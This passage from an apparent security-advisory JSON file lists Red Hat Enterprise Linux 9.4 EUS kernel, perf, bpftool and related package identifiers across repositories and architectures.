"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
